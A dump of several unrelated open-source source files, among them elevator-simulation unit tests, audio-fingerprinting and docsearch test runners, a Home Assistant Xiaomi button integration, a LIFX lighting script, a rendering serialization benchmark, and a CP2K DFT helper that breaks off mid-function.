self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 1.0)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_overload(self, mock_uniformgenerator):
"""
overload, two people enter together, check who can enter the elevator one by one
after overload, if the dispatcher still dispatches the elevator to the current floor, ignore the dispatch
"""
max_floors = 8
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0)
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_position = 8.0
test_elevator._target_floors = [5]
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[5].append(
PersonType(6, 750, 1, 6, world.raw_time))
test_elevator._loaded_person[7].append(
PersonType(7, 750, 1, 8, world.raw_time))
test_elevator._load_weight = 1500
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
ret_person.append(PersonType(0, 150, 3, 5, world.raw_time))
ret_person.append(PersonType(1, 50, 3, 1, world.raw_time))
ret_person.append(PersonType(2, 60, 5, 6, world.raw_time))
ret_person.append(PersonType(4, 65, 3, 8, world.raw_time))
ret_person.append(PersonType(5, 65, 3, 6, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, 1))
test_mansion.run_mansion(dispatch)
# mock generate_person again
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion.run_mansion(dispatch) # Door fully open, t = 1.0
dispatch = []
dispatch.append(ElevatorAction(-1, 0))
for i in range(4):
test_mansion.run_mansion(dispatch) # upload person 4, t = 3.0
dispatch = []
dispatch.append(ElevatorAction(3, 1))
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 1565)
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # t = 4.5
state = test_mansion.state
self.assertGreater(state.ElevatorStates[0].Velocity, 0.0)
# print(test_mansion.state, "\nworld time is", world.raw_time)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_stop_at_dispatch(self, mock_uniformgenerator):
"""
stop at the dispatch floor, open and close the door, then keep going to the target floor
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_velocity = 2.0
test_elevator._current_position = 4.0 # currently at 2 floor
test_elevator._target_floors = [5]
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[5].append(
PersonType(0, 50, 1, 6, world.raw_time))
test_elevator._load_weight = 50
# test_mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
# test
dispatch = []
dispatch.append(ElevatorAction(3, 1))
for i in range(7):
test_mansion.run_mansion(dispatch) # stop at the dispatched floor
# print(test_mansion.state, "\nworld time is", world.raw_time)
# dispatch = []
# dispatch.append(ElevatorAction(-1, 0))
for i in range(2):
# the door is fully open, t = 4.5
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 1.0)
dispatch = []
dispatch.append(ElevatorAction(0, 0))
for i in range(6):
# finish time open lag and close the door
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 0.0)
for i in range(4):
test_mansion.run_mansion(dispatch) # then keep going up
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 2.0)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_dispatch_when_closing(self, mock_uniformgenerator):
"""
dispatch the current floor when the door is closing
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_position = 8.0
test_elevator._target_floors = [4, 5]
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[3].append(
PersonType(6, 40, 1, 4, world.raw_time))
test_elevator._loaded_person[4].append(
PersonType(7, 40, 1, 5, world.raw_time))
test_elevator._load_weight = 80
# test_mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
ret_person.append(PersonType(0, 50, 3, 5, world.raw_time))
ret_person.append(PersonType(1, 50, 3, 1, world.raw_time))
ret_person.append(PersonType(2, 60, 6, 4, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, 1))
# run_mansion
test_mansion.run_mansion(dispatch)
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion.run_mansion(dispatch) # the door is open, t = 1.0
# print(test_mansion.state, "\nworld time is", world.raw_time)
dispatch = []
dispatch.append(ElevatorAction(-1, 0))
for i in range(4):
test_mansion.run_mansion(dispatch) # load person 0, t = 3.0
# the door is closing, the door state = 0.5, t = 3.5
test_mansion.run_mansion(dispatch)
# come two more passengers
ret_person = []
ret_person.append(PersonType(4, 55, 3, 4, world.raw_time))
ret_person.append(PersonType(5, 65, 3, 6, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
dispatch = []
dispatch.append(ElevatorAction(3, 1))
# the door is open, door_state = 1.0, time = 4.0
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 1.0)
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
dispatch = []
dispatch.append(ElevatorAction(-1, 0))
for i in range(4):
test_mansion.run_mansion(dispatch) # load the two passengers
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].LoadWeight, 250)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_dispatch_invalid(self, mock_uniformgenerator):
"""
ignore the invalid dispatch (cannot stop at the dispatch)
and decelerate when needed (test velocity_planner)
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_eleavtor")
test_elevator._direction = 1
test_elevator._current_velocity = 2.0
test_elevator._current_position = 8.0 # currently at 3 floor
test_elevator._target_floors = [5, 8] # target 5 floor
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[4].append(
PersonType(6, 40, 1, 5, world.raw_time))
test_elevator._loaded_person[7].append(
PersonType(7, 40, 1, 8, world.raw_time))
test_elevator._load_weight = 80
# test_mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, 1))
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 2.0)
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(
state.ElevatorStates[0].Velocity,
2.0) # ignore the invalid dispatch
for i in range(5):
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 0.0)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_no_dispatch(self, mock_uniformgenerator):
"""
arrive at the target, no dispatch, hold still
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_eleavtor")
test_elevator._direction = 1
test_elevator._current_velocity = 0
test_elevator._current_position = 8.0 # currently at 3 floor
test_elevator._target_floors = [3] # target 3 floor
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._loaded_person[2].append(
PersonType(0, 40, 1, 3, world.raw_time))
test_elevator._load_weight = 40
# test_mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(-1, 0))
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # open the door
for i in range(4):
test_mansion.run_mansion(dispatch) # unload person 0
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # close the door
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 0.0)
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 0.0)
self.assertAlmostEqual(state.ElevatorStates[0].Floor, 3.0)
self.assertAlmostEqual(state.ElevatorStates[0].Direction, 0)
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_dispatch_twice(self, mock_uniformgenerator):
"""
no target, dispatch (3, 1) first, then (8, -1)
decelerate then accelerate
not accelerate immediately
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_velocity = 2.0
test_elevator._current_position = 9.0
test_elevator._target_floors = list()
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._load_weight = 0
# mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
# first, dispatch to 8 floor
dispatch = []
dispatch.append(ElevatorAction(4, 1))
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch)
dispatch = []
dispatch.append(ElevatorAction(8, -1))
test_mansion.run_mansion(dispatch) # accelerate at once
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 2.0)
# checked
# @unittest.skip("test")
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_cancel_dispatch(self, mock_uniformgenerator):
"""
no target, dispatch first, accelerate, then cancel dispatch, decelerate
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 0
test_elevator._current_velocity = 0.0
test_elevator._current_position = 8.0
test_elevator._target_floors = list()
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._load_weight = 0
# mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(6, 1))
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # t = 1.0
dispatch = []
dispatch.append(ElevatorAction(0, -1))
for i in range(10):
test_mansion.run_mansion(dispatch)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].DoorState, 0.0)
self.assertAlmostEqual(state.ElevatorStates[0].Velocity, 0.0)
@mock.patch("person_generators.uniform_generator.UniformPersonGenerator")
def test_set_direction_0(self, mock_uniformgenerator):
"""
When the elevator is stopped and empty, always set direction as 0 first,
then set as dispatch_target_direction
"""
max_floors = 8
# mansion_config
world = MansionConfig(
dt=0.50,
number_of_floors=max_floors,
floor_height=4.0
)
# test_elevator
test_elevator = Elevator(start_position=0.0,
mansion_config=world,
name="test_elevator")
test_elevator._direction = 1
test_elevator._current_velocity = 0.0
test_elevator._current_position = 8.0 # 3rd floor
test_elevator._target_floors = list()
test_elevator._loaded_person = [
list() for i in range(
test_elevator._number_of_floors)]
test_elevator._load_weight = 0
# mansion
tmp_uniform_generator = UniformPersonGenerator()
ret_person = []
ret_person.append(PersonType(0, 50, 3, 1, world.raw_time))
person_generators.uniform_generator.UniformPersonGenerator.generate_person = mock.Mock(
return_value=(ret_person))
test_mansion = MansionManager(
elevator_number=1,
person_generator=tmp_uniform_generator,
mansion_config=world,
name="test_mansion"
)
test_mansion._elevators = [test_elevator]
dispatch = []
dispatch.append(ElevatorAction(3, -1))
test_mansion.run_mansion(dispatch)
test_mansion.run_mansion(dispatch) # t = 1.0
# print(test_mansion.state, "\nworld time is", world.raw_time)
state = test_mansion.state
self.assertAlmostEqual(state.ElevatorStates[0].Direction, -1)
if __name__ == '__main__':
unittest.main()
|
run_tests.py | datafaust/dejavu | 4,591 | 12609938 | import argparse
import logging
import time
from os import makedirs
from os.path import exists, join
from shutil import rmtree
import matplotlib.pyplot as plt
import numpy as np
from dejavu.tests.dejavu_test import (DejavuTest, autolabeldoubles,
generate_test_files, log_msg, set_seed)
def main(seconds: int, results_folder: str, temp_folder: str, log: bool, silent: bool,
log_file: str, padding: int, seed: int, src: str):
# set random seed if set by user
set_seed(seed)
# ensure results folder exists
if not exists(results_folder):
makedirs(results_folder)
# set logging
if log:
logging.basicConfig(filename=log_file, level=logging.DEBUG)
# set test seconds
test_seconds = [f'{i}sec' for i in range(1, seconds + 1, 1)]
# generate testing files
for i in range(1, seconds + 1, 1):
generate_test_files(src, temp_folder, i, padding=padding)
# scan files
log_msg(f"Running Dejavu fingerprinter on files in {src}...", log=log, silent=silent)
tm = time.time()
djv = DejavuTest(temp_folder, test_seconds)
log_msg(f"finished obtaining results from dejavu in {(time.time() - tm)}", log=log, silent=silent)
tests = 1 # djv
n_secs = len(test_seconds)
# set result variables -> 4d variables
all_match_counter = [[[0 for x in range(tests)] for x in range(3)] for x in range(n_secs)]
all_matching_times_counter = [[[0 for x in range(tests)] for x in range(2)] for x in range(n_secs)]
all_query_duration = [[[0 for x in range(tests)] for x in range(djv.n_lines)] for x in range(n_secs)]
all_match_confidence = [[[0 for x in range(tests)] for x in range(djv.n_lines)] for x in range(n_secs)]
# group results by seconds
for line in range(0, djv.n_lines):
for col in range(0, djv.n_columns):
# for dejavu
all_query_duration[col][line][0] = djv.result_query_duration[line][col]
all_match_confidence[col][line][0] = djv.result_match_confidence[line][col]
djv_match_result = djv.result_match[line][col]
if djv_match_result == 'yes':
all_match_counter[col][0][0] += 1
elif djv_match_result == 'no':
all_match_counter[col][1][0] += 1
else:
all_match_counter[col][2][0] += 1
djv_match_acc = djv.result_matching_times[line][col]
if djv_match_acc == 0 and djv_match_result == 'yes':
all_matching_times_counter[col][0][0] += 1
elif djv_match_acc != 0:
all_matching_times_counter[col][1][0] += 1
# create plots
djv.create_plots('Confidence', all_match_confidence, results_folder)
djv.create_plots('Query duration', all_query_duration, results_folder)
for sec in range(0, n_secs):
ind = np.arange(3)
width = 0.25 # the width of the bars
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlim([-1 * width, 2.75])
means_dvj = [round(x[0] * 100 / djv.n_lines, 1) for x in all_match_counter[sec]]
rects1 = ax.bar(ind, means_dvj, width, color='r')
# add some
ax.set_ylabel('Matching Percentage')
ax.set_title(f'{test_seconds[sec]} Matching Percentage')
ax.set_xticks(ind + width)
labels = ['yes', 'no', 'invalid']
ax.set_xticklabels(labels)
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.75, box.height])
autolabeldoubles(rects1, ax)
plt.grid()
fig_name = join(results_folder, f"matching_perc_{test_seconds[sec]}.png")
fig.savefig(fig_name)
for sec in range(0, n_secs):
ind = np.arange(2)
width = 0.25 # the width of the bars
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlim([-1 * width, 1.75])
div = all_match_counter[sec][0][0]
if div == 0:
div = 1000000
means_dvj = [round(x[0] * 100 / div, 1) for x in all_matching_times_counter[sec]]
rects1 = ax.bar(ind, means_dvj, width, color='r')
# add some
ax.set_ylabel('Matching Accuracy')
ax.set_title(f'{test_seconds[sec]} Matching Times Accuracy')
ax.set_xticks(ind + width)
labels = ['yes', 'no']
ax.set_xticklabels(labels)
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.75, box.height])
autolabeldoubles(rects1, ax)
plt.grid()
fig_name = join(results_folder, f"matching_acc_{test_seconds[sec]}.png")
fig.savefig(fig_name)
# remove temporary folder
rmtree(temp_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=f'Runs a few tests for dejavu to evaluate '
f'its configuration performance. '
f'Usage: %(prog).py [options] TESTING_AUDIOFOLDER'
)
parser.add_argument("-sec", "--seconds", action="store", default=5, type=int,
help='Number of seconds starting from zero to test.')
parser.add_argument("-res", "--results-folder", action="store", default="./dejavu_test_results",
help='Sets the path where the results are saved.')
parser.add_argument("-temp", "--temp-folder", action="store", default="./dejavu_temp_testing_files",
help='Sets the path where the temp files are saved.')
parser.add_argument("-l", "--log", action="store_true", default=False, help='Enables logging.')
parser.add_argument("-sl", "--silent", action="store_false", default=False, help='Disables printing.')
parser.add_argument("-lf", "--log-file", default="results-compare.log",
help='Set the path and filename of the log file.')
parser.add_argument("-pad", "--padding", action="store", default=10, type=int,
help='Number of seconds to pad choice of place to test from.')
parser.add_argument("-sd", "--seed", action="store", default=None, type=int, help='Random seed.')
parser.add_argument("src", type=str, help='Source folder for audios to use as tests.')
args = parser.parse_args()
main(args.seconds, args.results_folder, args.temp_folder, args.log, args.silent, args.log_file, args.padding,
args.seed, args.src)
|
tests/python/contrib/test_hexagon/test_run_unit_tests.py | shengxinhu/tvm | 4,640 | 12609939 | <filename>tests/python/contrib/test_hexagon/test_run_unit_tests.py<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import pytest
import numpy as np
import tvm
from tvm.contrib.hexagon.session import Session
# use pytest -sv to observe gtest output
# use --gtest_args to pass arguments to gtest
# for example to run all "foo" tests twice and observe gtest output run
# pytest -sv <this file> --gtests_args="--gtest_filter=*foo* --gtest_repeat=2"
@tvm.testing.requires_hexagon
def test_run_unit_tests(hexagon_session: Session, gtest_args):
try:
func = hexagon_session._rpc.get_function("hexagon.run_unit_tests")
except:
print(
"This test requires TVM Runtime to be built with a Hexagon gtest version using Hexagon API cmake flag -DUSE_HEXAGON_GTEST=/path/to/hexagon/sdk/utils/googletest/gtest"
)
raise
gtest_error_code_and_output = func(gtest_args)
gtest_error_code = int(gtest_error_code_and_output.splitlines()[0])
gtest_output = gtest_error_code_and_output.split("\n", 1)[-1]
print(gtest_output)
np.testing.assert_equal(gtest_error_code, 0)
|
homeassistant/components/xiaomi_miio/button.py | MrDelik/core | 30,023 | 12609955 | """Support for Xiaomi buttons."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Any
from homeassistant.components.button import (
ButtonDeviceClass,
ButtonEntity,
ButtonEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_MODEL
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
DOMAIN,
KEY_COORDINATOR,
KEY_DEVICE,
MODEL_AIRFRESH_A1,
MODEL_AIRFRESH_T2017,
)
from .device import XiaomiCoordinatedMiioEntity
ATTR_RESET_DUST_FILTER = "reset_dust_filter"
ATTR_RESET_UPPER_FILTER = "reset_upper_filter"
@dataclass
class XiaomiMiioButtonDescription(ButtonEntityDescription):
"""A class that describes button entities."""
method_press: str = ""
method_press_error_message: str = ""
BUTTON_TYPES = (
XiaomiMiioButtonDescription(
key=ATTR_RESET_DUST_FILTER,
name="Reset Dust Filter",
icon="mdi:air-filter",
method_press="reset_dust_filter",
method_press_error_message="Resetting the dust filter lifetime failed",
entity_category=EntityCategory.CONFIG,
),
XiaomiMiioButtonDescription(
key=ATTR_RESET_UPPER_FILTER,
name="Reset Upper Filter",
icon="mdi:air-filter",
method_press="reset_upper_filter",
method_press_error_message="Resetting the upper filter lifetime failed.",
entity_category=EntityCategory.CONFIG,
),
)
MODEL_TO_BUTTON_MAP: dict[str, tuple[str, ...]] = {
MODEL_AIRFRESH_A1: (ATTR_RESET_DUST_FILTER,),
MODEL_AIRFRESH_T2017: (
ATTR_RESET_DUST_FILTER,
ATTR_RESET_UPPER_FILTER,
),
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the button from a config entry."""
model = config_entry.data[CONF_MODEL]
if model not in MODEL_TO_BUTTON_MAP:
return
entities = []
buttons = MODEL_TO_BUTTON_MAP[model]
unique_id = config_entry.unique_id
device = hass.data[DOMAIN][config_entry.entry_id][KEY_DEVICE]
coordinator = hass.data[DOMAIN][config_entry.entry_id][KEY_COORDINATOR]
for description in BUTTON_TYPES:
if description.key not in buttons:
continue
entities.append(
XiaomiGenericCoordinatedButton(
f"{config_entry.title} {description.name}",
device,
config_entry,
f"{description.key}_{unique_id}",
coordinator,
description,
)
)
async_add_entities(entities)
class XiaomiGenericCoordinatedButton(XiaomiCoordinatedMiioEntity, ButtonEntity):
"""A button implementation for Xiaomi."""
entity_description: XiaomiMiioButtonDescription
_attr_device_class = ButtonDeviceClass.RESTART
def __init__(self, name, device, entry, unique_id, coordinator, description):
"""Initialize the plug switch."""
super().__init__(name, device, entry, unique_id, coordinator)
self.entity_description = description
async def async_press(self, **kwargs: Any) -> None:
"""Press the button."""
method = getattr(self._device, self.entity_description.method_press)
await self._try_command(
self.entity_description.method_press_error_message,
method,
)
|
cli/src/commands/run_tests.py | erichiggins0/docsearch-scraper | 242 | 12609984 | <reponame>erichiggins0/docsearch-scraper
from .abstract_command import AbstractCommand
class RunTests(AbstractCommand):
def get_name(self):
return "test"
def get_description(self):
return "Run tests"
def get_options(self):
return [{"name": "docker",
"description": "run test from docker image",
"optional": False}]
@staticmethod
def docker_parse(args):
if len(args) < 2:
return False
if isinstance(args[1], bool):
return args[1]
if args[1] is "no_browser":
return "no_browser"
return isinstance(args[1], str) and args[1].lower() == "true"
def run(self, args):
docker = self.get_option("docker", args)
if docker == True:
self.exec_shell_command(["./docsearch", "docker:build", "true"])
run_command = [
"docker",
"run",
"--rm",
"-i",
"--name",
"docsearch-scraper-test",
"-t",
"algolia/docsearch-scraper-test"]
return self.exec_shell_command(run_command)
test_command = ["pytest", "./scraper/src"]
if docker == "no_browser":
test_command.append("-k")
test_command.append("not _browser")
print(test_command)
return self.exec_shell_command(test_command)
|
examples/breathe_all.py | ceboxsell/LocalLifxLan | 464 | 12609986 | <reponame>ceboxsell/LocalLifxLan
#!/usr/bin/env python
# coding=utf-8
import sys
from copy import copy
from time import sleep, time
from lifxlan import LifxLAN
def main():
num_lights = None
if len(sys.argv) != 2:
print("\nDiscovery will go much faster if you provide the number of lights on your LAN:")
print(" python {} <number of lights on LAN>\n".format(sys.argv[0]))
else:
num_lights = int(sys.argv[1])
# instantiate LifxLAN client, num_lights may be None (unknown).
# In fact, you don't need to provide LifxLAN with the number of bulbs at all.
# lifx = LifxLAN() works just as well. Knowing the number of bulbs in advance
# simply makes initial bulb discovery faster.
lifx = LifxLAN(num_lights)
# test power control
print("Discovering lights...")
original_powers = lifx.get_power_all_lights()
original_colors = lifx.get_color_all_lights()
half_period_ms = 2500
duration_mins = 20
duration_secs = duration_mins*60
print("Breathing...")
try:
start_time = time()
while True:
for bulb in original_colors:
color = original_colors[bulb]
dim = list(copy(color))
dim[2] = 1900
bulb.set_color(dim, half_period_ms, rapid=True)
sleep(half_period_ms/1000.0)
for bulb in original_colors:
color = original_colors[bulb]
bulb.set_color(color, half_period_ms, rapid=True)
sleep(half_period_ms/1000.0)
if time() - start_time > duration_secs:
raise KeyboardInterrupt
except KeyboardInterrupt:
print("Restoring original color to all lights...")
for light in original_colors:
color = original_colors[light]
light.set_color(color)
print("Restoring original power to all lights...")
for light in original_powers:
power = original_powers[light]
light.set_power(power)
if __name__=="__main__":
main()
|
functest/perf_serial.py | Luvideria/lightmetrica-v3 | 101 | 12610000 | # ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Performance testing of serialization
#
# This test checks the performance improvement of scene setup with serialization feature.
import lmenv
env = lmenv.load('.lmenv')
import os
import imageio
import pandas as pd
import numpy as np
import timeit
# %matplotlib inline
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import lmscene
import lightmetrica as lm
# %load_ext lightmetrica_jupyter
lm.init()
lm.log.init('jupyter')
lm.progress.init('jupyter')
lm.info()
scene_names = lmscene.scenes_small()
scene_setup_time_df = pd.DataFrame(
columns=['scene loading', 'serialization', 'deserialization'],
index=scene_names)
for scene_name in scene_names:
lm.reset()
lm.load_film('film_output', 'bitmap', {
'w': 1920,
'h': 1080
})
# Load the scene without serialization
def load_scene():
accel = lm.load_accel('accel', 'sahbvh', {})
scene = lm.load_scene('scene', 'default', {
'accel': accel.loc()
})
lmscene.load(scene, env.scene_path, scene_name)
loading_time_without_serialization = timeit.timeit(stmt=load_scene, number=1)
scene_setup_time_df['scene loading'][scene_name] = loading_time_without_serialization
# Export the internal state to a file
def serialize_scene():
lm.save_state_to_file('lm.serialized')
serialization_time = timeit.timeit(stmt=serialize_scene, number=1)
scene_setup_time_df['serialization'][scene_name] = serialization_time
# Import the internal state from the serialized file
lm.reset()
def deserialize_scene():
lm.load_state_from_file('lm.serialized')
deserialization_time = timeit.timeit(stmt=deserialize_scene, number=1)
scene_setup_time_df['deserialization'][scene_name] = deserialization_time
scene_setup_time_df
|
flare/dft_interface/cp2k_util.py | aaronchen0316/flare | 144 | 12610001 | """
This module is used to call CP2K simulation and parse its output
The user need to supply a complete input script with ENERGY_FORCE or ENERGY runtype, and CELL, COORD blocks. Example scripts can be found in tests/test_files/cp2k_input...
The module will copy the input template to a new file with "_run" suffix,
edit the atomic coordination in the COORD blocks and run the similation with
the parallel set up given.
We note that, if the CP2K executable is only for serial run, using it along with MPI setting can lead to repeating output in the output file, wrong number of forces and error in the other modules.
"""
import os
from subprocess import call
import time
import numpy as np
from flare import output
from flare import struc
from typing import List
name = "CP2K"
def run_dft_par(
dft_input,
structure,
dft_loc,
ncpus=1,
dft_out="dft.out",
npool=None,
mpi="mpi",
**dft_kwargs,
):
"""run DFT calculation with given input template
and atomic configurations. if ncpus == 1, it executes serial run.
:param dft_input: input template file name
:param structure: atomic configuration
:param dft_loc: relative/absolute executable of the DFT code
:param ncpus: # of CPU for mpi
:param dft_out: output file name
:param npool: not used
:param mpi: not used
:param **dft_wargs: not used
:return: forces
"""
newfilename = edit_dft_input_positions(dft_input, structure)
dft_command = f"{dft_loc} -i {newfilename}"
if ncpus > 1:
if mpi == "mpi":
dft_command = f"mpirun -np {ncpus} {dft_command}"
else:
dft_command = f"srun -n {ncpus} {dft_command}"
# output.write_to_output(dft_command+'\n')
with open(dft_out, "w+") as fout:
call(dft_command.split(), stdout=fout)
os.remove(newfilename)
return parse_dft_forces(dft_out)
def run_dft_en_par(
dft_input: str,
structure,
dft_loc: str,
ncpus: int,
dft_out: str = "dft.out",
npool: int = None,
mpi: str = "mpi",
**dft_kwargs,
):
"""run DFT calculation with given input template
and atomic configurations. This function is not used atm.
:param dft_input: input template file name
:param structure: atomic configuration
:param dft_loc: relative/absolute executable of the DFT code
:param ncpus: # of CPU for mpi
:param dft_out: output file name
:param npool: not used
:param mpi: not used
:param **dft_wargs: not used
:return: forces, energy
"""
newfilename = edit_dft_input_positions(dft_input, structure)
dft_command = f"{dft_loc} -i {newfilename} > {dft_out}"
if ncpus > 1:
